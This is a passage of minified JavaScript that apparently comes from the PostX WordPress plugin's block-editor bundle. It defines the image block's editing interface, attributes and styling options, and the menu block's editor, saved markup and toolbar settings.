J;if(_&&(J=(0,i.Kh)(w,"ultimate-post/image",_,(0,a.k0)())),T)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:T});const Y=wp.data.select("core/block-editor").getBlock(k),X={handleLoader:e=>{v({loading:e})},setAttributes:h,name:f,attributes:w,setSection:l,section:t,clientId:k,block:Y,setDevice:e=>{e&&v({device:e})},setState:v,state:b},Q=p({...C&&{id:C},className:`ultp-block-${_} ${x}`});return(0,o.createElement)(d,null,(0,o.createElement)(r,null,(0,o.createElement)(n.Z,{store:X}),(0,a.dH)()),(0,o.createElement)("div",Q,J&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:J}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("figure",{className:"ultp-image-block-wrapper"},(0,o.createElement)("div",{className:`ultp-image-block ultp-image-block-${U} ${!0===I?"ultp-image-block-overlay ultp-image-block-"+B:""} ${b.loading?" ultp-loading-active":""}`},K&&!b.loading?"link"==F&&P?(0,o.createElement)("a",null,(0,o.createElement)("img",{className:"ultp-image",src:K,alt:L||"Image"})):(0,o.createElement)("img",{className:"ultp-image",src:K,alt:L||"Image"}):(0,o.createElement)(d,null,(0,o.createElement)("img",{className:"ultp-image",src:K,alt:L||"Image"}),(0,o.createElement)(m,null)),"button"==F&&O&&(0,o.createElement)("div",{className:`ultp-image-button ultp-image-button-${z}`},(0,o.createElement)("a",{href:"#"},R))),H&&E&&(0,o.createElement)(s,{key:"editable",tagName:"figcaption",className:"ultp-image-caption",placeholder:__("Add Text…","ultimate-post"),onChange:e=>h({headingText:e}),value:E})))))}},9790:(e,t,l)=>{"use strict";l.d(t,{Z:()=>v});var o=l(67294),a=l(53049),i=l(69735),n=l(74971),r=l(22465),s=l(68477),p=l(3780),c=l(22217),u=l(60405),d=l(92637);const{__}=wp.i18n,{Fragment:m}=wp.element,{TextControl:g,PanelBody:y,SelectControl:b}=wp.components,v=({store:e})=>{const{handleLoader:t,setAttributes:l,name:v,attributes:h,setSection:f,section:k,clientId:w,block:x,setDevice:T,setState:_,state:C}=e,{imageUpload:E,imgLink:S,imgAlt:P,headingColor:L,headingTypo:I,headingEnable:B,headingMargin:U,linkTarget:M,alignment:A,btnLink:H,btnText:N,btnTarget:j,btnPosition:Z,linkType:O,darkImgEnable:R,darkImage:D,dcEnabled:z}=h;return(0,o.createElement)(m,null,(0,o.createElement)(d.Sections,{classes:"ultp-imageBlock-sidebar-setting"},(0,o.createElement)(d.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(p.Z,{label:__("Upload Image","ultimate-post"),multiple:!1,block:"image-block",type:["image"],panel:!0,value:E,handleLoader:t,dcEnabled:z.imageUpload,DynamicContent:(0,o.createElement)(n.ZP,{headingBlock:x,attrKey:"imageUpload",isActive:!1,config:{disableAdv:!0,disableLink:!0,fieldType:"image"}}),onChange:e=>{l({imageUpload:e,imgAlt:e?.alt?e.alt:"Image Not Found",headingText:e?.caption?e.caption:"This is a Image Example"})}}),(0,o.createElement)(g,{className:"ultp-field-wrap",__nextHasNoMarginBottom:!0,label:__("Image Alt Text","ultimate-post"),value:P,onChange:e=>l({imgAlt:e})}),(0,o.createElement)(s.Z,{justify:!0,inline:!0,label:__("Link Type","ultimate-post"),options:[{label:__("Link","ultimate-post"),value:"link"},{label:__("Button","ultimate-post"),value:"button"}],value:O,onChange:e=>l({linkType:e})}),"link"==O&&(0,o.createElement)(m,null,(0,o.createElement)(r.nv,{value:S,placeholder:"Enter Custom URL",onChange:e=>l({imgLink:e}),isTextField:!0,label:__("Link Url","ultimate-post"),attr:{label:__("Link","ultimate-post"),disabled:z.imgLink},DC:(0,i.o6)()?(0,o.createElement)(n.ZP,{headingBlock:x,isActive:!1,attrKey:"imgLink",config:{linkOnly:!0,disableAdv:!0,fieldType:"url"}}):null}),(0,o.createElement)(c.Z,{label:__("Link Target","ultimate-post"),value:M||"",options:[{label:__("Self","ultimate-post"),value:"_self"},{label:__("Blank","ultimate-post"),value:"_blank"}],onChange:e=>l({linkTarget:e})})),"button"==O&&(0,o.createElement)(m,null,(0,o.createElement)(g,{className:"ultp-field-wrap",label:__("Button Text","ultimate-post"),value:N,onChange:e=>l({btnText:e})}),(0,o.createElement)(r.nv,{value:H,onChange:e=>l({btnLink:e}),isTextField:!0,attr:{label:__("Button Link","ultimate-post"),disabled:z.btnLink},DC:(0,i.o6)()?(0,o.createElement)(n.ZP,{headingBlock:x,isActive:!1,attrKey:"btnLink",config:{linkOnly:!0,disableAdv:!0,fieldType:"url"}}):null}),(0,o.createElement)(b,{__nextHasNoMarginBottom:!0,label:__("Button Link Target","ultimate-post"),value:j||"",options:[{label:__("Self","ultimate-post"),value:"_self"},{label:__("Blank","ultimate-post"),value:"_blank"}],onChange:e=>l({btnTarget:e})}),(0,o.createElement)(b,{__nextHasNoMarginBottom:!0,label:__("Button Position","ultimate-post"),value:Z||"",options:[{label:__("Left Top","ultimate-post"),value:"leftTop"},{label:__("Right Top","ultimate-post"),value:"rightTop"},{label:__("Center Center","ultimate-post"),value:"centerCenter"},{label:__("Bottom Left","ultimate-post"),value:"bottomLeft"},{label:__("Bottom Right","ultimate-post"),value:"bottomRight"}],onChange:e=>l({btnPosition:e})})),(0,o.createElement)(u.Z,{label:__("Enable Caption","ultimate-post"),value:B,onChange:e=>l({headingEnable:e})}),(0,o.createElement)(y,{className:"ultp-imageBlock-darkmode-setting",title:__("Dark Mode Image","ultimate-post")},(0,o.createElement)("div",{className:"ultp-imageBlock-darkmode-setting__body"},(0,o.createElement)(u.Z,{label:__("Enable Dark Image","ultimate-post"),value:R,onChange:e=>l({darkImgEnable:e})}),R&&(0,o.createElement)(p.Z,{label:__("Upload Dark Mode Image","ultimate-post"),multiple:!1,type:["image"],panel:!0,value:D,dcEnabled:z.darkImage,DynamicContent:(0,o.createElement)(n.ZP,{headingBlock:x,attrKey:"darkImage",isActive:!1,config:{disableAdv:!0,disableLink:!0,fieldType:"image"}}),onChange:e=>{l({darkImage:e})}})))),(0,o.createElement)(d.Section,{slug:"style",title:__("Style","ultimate-post")},(0,o.createElement)(a.Hn,{store:e,initialOpen:!0,exclude:["imgCropSmall","imgAnimation"],include:[{position:0,data:{type:"select",key:"imgAnimation",label:__("Image Hover Animation","ultimate-post"),options:[{value:"none",label:__("No Animation","ultimate-post")},{value:"zoomIn",label:__("Zoom In","ultimate-post")},{value:"zoomOut",label:__("Zoom Out","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"roateLeft",label:__("Rotate Left","ultimate-post")},{value:"rotateRight",label:__("Rotate Right","ultimate-post")}]}},{position:1,data:{type:"alignment",key:"imgAlignment",label:__("Image Align","ultimate-post"),responsive:!0,disableJustify:!0}}]}),B&&(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Caption","ultimate-post"),include:[{position:0,data:{type:"alignment",key:"alignment",label:__("Alignment","ultimate-post"),responsive:!0,icons:["left","center","right"]}},{position:1,data:{type:"color",key:"headingColor",label:__("Color","ultimate-post")}},{position:2,data:{type:"typography",key:"headingTypo",label:__("Typography","ultimate-post")}},{position:3,data:{type:"dimension",key:"headingMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),"button"==O&&(0,o.createElement)(a.ZJ,{store:e})),(0,o.createElement)(d.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))}},74412:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(92165),a=l(69735);const i={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},imageUpload:{type:"object",default:{id:"999999",url:ultp_data.url+"assets/img/ultp-placeholder.jpg"}},darkImgEnable:{type:"boolean",default:!1},darkImage:{type:"object",default:{url:ultp_data.url+"assets/img/ultp-placeholder.jpg"}},linkType:{type:"string",default:"link"},imgLink:{type:"string",default:""},linkTarget:{type:"string",default:"_blank"},imgAlt:{type:"string",default:"Image"},imgAlignment:{type:"object",default:{lg:"left"},style:[{selector:"{{ULTP}} .ultp-image-block-wrapper {text-align: {{imgAlignment}};}"}]},imgCrop:{type:"string",default:"full"},imgWidth:{type:"object",default:{lg:"",ulg:"px"},style:[{selector:"{{ULTP}} .ultp-image-block { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-image-block {object-fit: cover; height: {{imgHeight}}; } \n          {{ULTP}} .ultp-image-block .ultp-image {height: 100%;}"}]},imageScale:{type:"string",default:"cover",style:[{selector:"{{ULTP}} .ultp-image-block img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"none"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{selector:"{{ULTP}} .ultp-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{selector:"{{ULTP}} .ultp-image-block:hover .ultp-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-image-block { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-image-block:hover { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-image-block"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-image-block:hover"}]},imgMargin:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} .ultp-image-block { margin: {{imgMargin}}; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-image-block::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-image-block::before { opacity: {{imgOpacity}}; }"}]},imgLazy:{type:"boolean",default:!1},imgSrcset:{type:"boolean",default:!1},headingText:{type:"string",default:"This is a Image Example"},headingEnable:{type:"boolean",default:!1},headingColor:{type:"string",default:"",style:[{depends:[{key:"headingEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-caption { color:{{headingColor}}; }"}]},alignment:{type:"object",default:{lg:"left"},style:[{depends:[{key:"headingEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-caption {text-align: {{alignment}};}"}]},headingTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"",unit:"px"},decoration:"",transform:"",family:"",weight:""},style:[{depends:[{key:"headingEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-caption"}]},headingMargin:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"headingEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-image-caption { margin:{{headingMargin}}; }"}]},buttonEnable:{type:"boolean",default:!1},btnText:{type:"string",default:"Free Download"},btnLink:{type:"string",default:"#"},btnTarget:{type:"string",default:"_blank"},btnPosition:{type:"string",default:"centerCenter"},btnTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"",decoration:"none",family:""},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a"}]},btnColor:{type:"string",default:"#fff",style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a { color:{{btnColor}}; }"}]},btnBgColor:{type:"object",default:{openColor:1,type:"color",color:"#037fff"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}}  .ultp-image-button a"}]},btnBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a"}]},btnRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-button a { border-radius:{{btnRadius}}; }"}]},btnShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a"}]},btnHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a:hover { color:{{btnHoverColor}}; }"}]},btnBgHoverColor:{type:"object",default:{openColor:1,type:"color",color:"#1239e2"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-button a:hover"}]},btnHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a:hover"}]},btnHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-button a:hover { border-radius:{{btnHoverRadius}}; }"}]},btnHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a:hover"}]},btnSacing:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a { margin:{{btnSacing}}; }"}]},btnPadding:{type:"object",default:{lg:{top:"6",bottom:"6",left:"12",right:"12",unit:"px"}},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-button a { padding:{{btnPadding}}; }"}]},...(0,o.t)(["advanceAttr"],["loadingColor"]),...a.dh}},32294:(e,t,l)=>{"use strict";var o=l(67294),a=l(57283),i=l(74412),n=l(2204);const{__}=wp.i18n,{registerBlockType:r,createBlock:s}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/image.svg",alt:"Image"}),attributes:i.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/image.svg"}},edit:a.Z,transforms:{from:[{type:"block",blocks:["core/image"],transform:()=>s("ultimate-post/image")}]},save:()=>null})},6343:(e,t,l)=>{"use strict";l.d(t,{Z:()=>_});var o=l(87462),a=l(67294),i=l(53049),n=l(99838),r=l(87763),s=l(9612),p=l(50960),c=l(2955);const{__}=wp.i18n,{InspectorControls:u,InnerBlocks:d,BlockControls:m}=wp.blockEditor,{Fragment:g,useState:y,useEffect:b,useRef:v,useMemo:h}=wp.element,{Spinner:f,Placeholder:k,Dropdown:w,ToolbarButton:x}=wp.components,{getBlockParentsByBlockName:T}=wp.data.select("core/block-editor");function _(e){const t=v(null),l=v(!1),_=v(""),[C,E]=y(),[S,P]=y(!1),[L,I]=y("Content"),{setAttributes:B,name:U,className:M,attributes:A,clientId:H,attributes:{previewImg:N,blockId:j,advanceId:Z,hasRootMenu:O,previewMobileView:R,menuAlign:D,menuMvInheritCss:z,mvTransformToHam:F,menuInline:W,currentPostId:V,menuHamAppear:G}}=e;b((()=>{const e=H.substr(0,6);(0,i.qi)(B,"",V,H),j?j&&j!=e&&(l.current=!0,B({blockId:e}),setTimeout((()=>{P(!S),l.current=!1}),0)):(l.current=!0,wp.apiFetch({path:"/wp/v2/pages?per_page=4&parent=0"}).then((e=>{let t=[];e&&e.length>0&&"hasRootMenu"!=_.current&&(t=e.map((e=>["ultimate-post/menu-item",{parentMenuInline:W,menuItemText:e.title?.rendered||"No Title",menuItemLink:e.link,contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}]))),l.current=!1,E(t)})).catch((e=>{l.current=!1,E([]),console.error(e)})),B({blockId:e}))}),[H]),b((()=>{const e=t.current;if(e?(e=>{const{menuInline:t,dropIcon:l,iconAfterText:o}=A;if(e.menuInline!=t||e.iconAfterText!=o||e.dropIcon!=l)return!0})(e)&&(0,i.Gu)(H):t.current=A,T(H,["ultimate-post/menu"])?.length>0&&"hasRootMenu"!=O&&(B({hasRootMenu:"hasRootMenu"}),_.current="hasRootMenu"),e?.hasRootMenu!=O||e?.mvTransformToHam!=F||e?.menuHamAppear!=G){let e="";G&&F>0&&"hasRootMenu"!=O&&(e=`\n                    @media (max-width: ${F}px) {\n                        .postx-page {{ULTP}}[data-mv="enable"] > .ultp-menu-wrapper {\n                            display: none;\n                        }\n                        .postx-page {{ULTP}}[data-mv="enable"] > .ultp-mv-ham-icon.ultp-active {\n                            display: block;\n                        }\n                    }\n                `),B({menuMvResCss:e})}t.current=A}),[A]);const q={setAttributes:B,name:U,attributes:A,setSection:I,section:L,clientId:H},$=h((e=>(0,n.Kh)(A,"ultimate-post/menu",j,!1)),[A,H]);if(N)return(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:N});const K={name:"ultimate-post/menu-item",attributes:{parentMenuInline:W,menuItemText:"Menu Item",contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}},J="hasRootMenu"!=O&&R&&!z?"":"ultpMenuCss";return(0,a.createElement)(g,null,(0,a.createElement)(m,null,(0,a.createElement)(c.j,{isSelected:e.isSelected,menuInline:W,clientId:H,menuAlign:D,store:q})),(0,a.createElement)(u,null,(0,a.createElement)(c.H,{store:q,hasRootMenu:O,menuInline:W,menuHamAppear:G})),l.current?(0,a.createElement)(k,{className:"ultp-backend-block-loading ultp-menu-block",label:__("Loading…","ultimate-post")},(0,a.createElement)(f,null)):(0,a.createElement)("div",(0,o.Z)({},Z&&{id:Z},{"data-menuinline":W,className:`ultp-block-${j} ${M} ${J}`}),$&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:$}}),"hasRootMenu"!=O&&R?(0,a.createElement)(p.n,{attributes:A}):(0,a.createElement)("div",{className:`ultp-menu-wrapper _${D}`},(0,a.createElement)("div",{className:"ultp-menu-content"},(0,a.createElement)(d,{template:C?.length?C:[["ultimate-post/menu-item",{parentMenuInline:!0,menuItemText:"Menu #1",contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}],["ultimate-post/menu-item",{parentMenuInline:!0,menuItemText:"Menu #2",contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}],["ultimate-post/menu-item",{parentMenuInline:!0,menuItemText:"Menu #3",contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}]],defaultBlock:K,allowedBlocks:["ultimate-post/menu-item"],directInsert:!0,renderAppender:!!e.isSelected&&(()=>(0,a.createElement)("div",{className:"ultp-menu-block-appender"},(0,a.createElement)(w,{contentClassName:"ultp-menu-toolbar-drop",renderToggle:({onToggle:e})=>(0,a.createElement)(x,{label:"Add Item",icon:r.Z.plus,onClick:()=>e()}),renderContent:({onClose:e})=>(0,a.createElement)(s.k,{hasStep:!0,callback:t=>{const{_title:l,_url:o,_target:a}=t;e(),wp.data.dispatch("core/block-editor").insertBlock(wp.blocks.createBlock("ultimate-post/menu-item",{parentMenuInline:W,menuItemText:l,menuItemLink:o,menuLinkTarget:a,contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}),999,H,!1)}})})))})))))}},53283:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{InnerBlocks:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,menuMvInheritCss:n,menuResStructure:r,hasRootMenu:s,menuAlign:p,mvTransformToHam:c,backIcon:u,closeIcon:d,mvHamIcon:m,naviExpIcon:g,naviIcon:y,mvHeadtext:b,menuHamAppear:v,mvAnimationDuration:h,mvDrawerPosition:f,menuInline:k}=e.attributes,w=v&&"hasRootMenu"!=s?{"data-mvtoham":c,"data-rcsstype":n?"own":"custom","data-rstr":r,"data-mv":"hasRootMenu"!=s?"enable":"disable"}:{"data-hasrootmenu":s},x=Object.keys(w),T={"data-animationduration":h,"data-headtext":b};return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{"data-bid":t,"data-menuinline":k,className:`ultp-block-${t} ultpMenuCss`},x&&w),v&&"hasRootMenu"!=s&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",(0,o.Z)({},T,{className:"ultp-mv-ham-icon ultp-active"}),"_ultp_mn_ic_"+(m||"hamicon_3")+"_ultp_mn_ic_end_"),(0,a.createElement)("div",{"data-drawerpos":f,className:"ultp-mobile-view-container ultp-mv-trigger"},(0,a.createElement)("div",{className:"ultp-mobile-view-wrapper"},(0,a.createElement)("div",{className:"ultp-mobile-view-head"},(0,a.createElement)("div",{className:"ultp-mv-back-label-con ultpmenu-dnone"},"_ultp_mn_ic_"+(u||"leftAngle2")+"_ultp_mn_ic_end_",(0,a.createElement)("div",{className:"ultp-mv-back-label"},b)),(0,a.createElement)("div",{className:"ultp-mv-close"},"_ultp_mn_ic_"+(d||"close_line")+"_ultp_mn_ic_end_")),(0,a.createElement)("div",{className:"ultp-mobile-view-body"})),(0,a.createElement)("div",{className:"ultp-mv-icons"},(0,a.createElement)("div",{className:"ultp-mv-label-icon"},"_ultp_mn_ic_"+(y||"rightAngle2")+"_ultp_mn_ic_end_"),(0,a.createElement)("div",{className:"ultp-mv-label-icon-expand"},"_ultp_mn_ic_"+(g||"arrowUp2")+"_ultp_mn_ic_end_")))),(0,a.createElement)("div",{className:`ultp-menu-wrapper _${p}`},(0,a.createElement)("div",{className:"ultp-menu-content"},(0,a.createElement)(i.Content,null))))}},2955:(e,t,l)=>{"use strict";l.d(t,{H:()=>v,j:()=>b});var o=l(67294),a=l(53049),i=l(18958),n=l(87763),r=l(92637),s=l(43581),p=l(64766),c=l(9612);const{__}=wp.i18n,{ToolbarGroup:u,ToolbarButton:d,Dropdown:m,Modal:g}=wp.components,{useState:y}=wp.element,b=e=>{const{menuInline:t,clientId:l,isSelected:r,menuAlign:s,store:p}=e,[b,v]=y(!1),h=()=>v(!1);return(0,o.createElement)(o.Fragment,null,r&&(0,o.createElement)(u,{className:"ultp-menu-toolbar-group"},(0,o.createElement)(m,{contentClassName:"ultp-menu-toolbar-drop",renderToggle:({onToggle:e})=>(0,o.createElement)("div",{className:"ultp-menu-toolbar-add-item",onClick:()=>e()},n.Z.plus,(0,o.createElement)("div",{className:"__label"},__("Add Item","ultimate-post"))),renderContent:({onClose:e})=>(0,o.createElement)(c.k,{hasStep:!0,callback:o=>{const{_title:a,_url:i,_target:n}=o;e(),wp.data.dispatch("core/block-editor").insertBlock(wp.blocks.createBlock("ultimate-post/menu-item",{parentMenuInline:t,menuItemText:a,menuItemLink:i,menuLinkTarget:n,contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}),999,l,!1)}})}),(0,o.createElement)(m,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(d,{label:"Alignment",icon:n.Z[s],onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:10,data:{type:"alignment",key:"menuAlign",block:"menu",inline:!0,disableJustify:!0,icons:["left","center","right"],options:["left","center","right"],label:__("Alignment","ultimate-post")}}],initialOpen:!0,store:p})}),(0,o.createElement)(m,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(d,{label:"Style",icon:n.Z.styleIcon,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{position:20,data:{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{position:20,data:{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:p})}),(0,o.createElement)(m,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(d,{label:"Spacing",icon:n.Z.spacing,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:20,data:{type:"range",key:"menuItemGap",min:0,max:200,step:1,responsive:!0,unit:["px","%"],label:__("Menu item gap","ultimate-post")}}],initialOpen:!0,store:p})}),(0,o.createElement)(d,{className:"ultp-toolbar-template__btn",onClick:()=>v(!0),label:"Patterns"},(0,o.createElement)("span",{className:"dashicons dashicons-images-alt2"})),b&&(0,o.createElement)(g,{isFullScreen:!0,onRequestClose:h},(0,o.createElement)(i.Z,{store:p,closeModal:h}))))},v=({store:e,hasRootMenu:t,menuInline:l,menuHamAppear:i})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(s.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid8819",store:e}),(0,o.createElement)(r.Sections,{callback:t=>{"hamburger"==t.slug?e.setAttributes({previewMobileView:!0}):e.setAttributes({previewMobileView:!1,previewHamIcon:!1})},classes:" ultp-menu-side-settings"},(0,o.createElement)(r.Section,{slug:"global",title:__("Normal View","ultimate-post"),icon:!1},(0,o.createElement)(a.T,{title:"inline",include:[{position:5,data:{type:"toggle",key:"menuInline",label:__("Inline","ultimate-post")}},{position:20,data:{type:"range",key:"menuItemGap",min:0,max:200,step:1,responsive:!0,unit:["px","%"],label:__("Menu item gap","ultimate-post")}},{position:10,data:{type:"alignment",key:"menuAlign",block:"menu",disableJustify:!0,icons:["left","center","right"],options:["left","center","right"],label:__("Alignment","ultimate-post")}},{position:11,data:{type:"alignment",key:"menuAlignItems",block:"menu",disableJustify:!0,icons:l?["alignStartR","alignCenterR","alignEndR","alignStretchR"]:["left_new","center_new","right_new","alignStretch"],options:["flex-start","center","flex-end","stretch"],label:__("Items Alignment","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Menu Items","ultimate-post"),include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"toggle",key:"currentItemStyle",label:__("User Hover as Active Color","ultimate-post")},{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Item Icon","ultimate-post"),include:[{position:5,data:{type:"toggle",key:"iconAfterText",label:__("Icon After Text","ultimate-post")}},{position:10,data:{type:"range",key:"iconSize",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"range",key:"iconSpacing",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Spacing","ultimate-post")}},{position:30,data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{position:40,data:{type:"color",key:"iconColorHvr",label:__("Hover Color","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Dropdown Icon","ultimate-post"),include:[{position:5,data:{type:"icon",key:"dropIcon",selection:a.ov,label:__("Choose 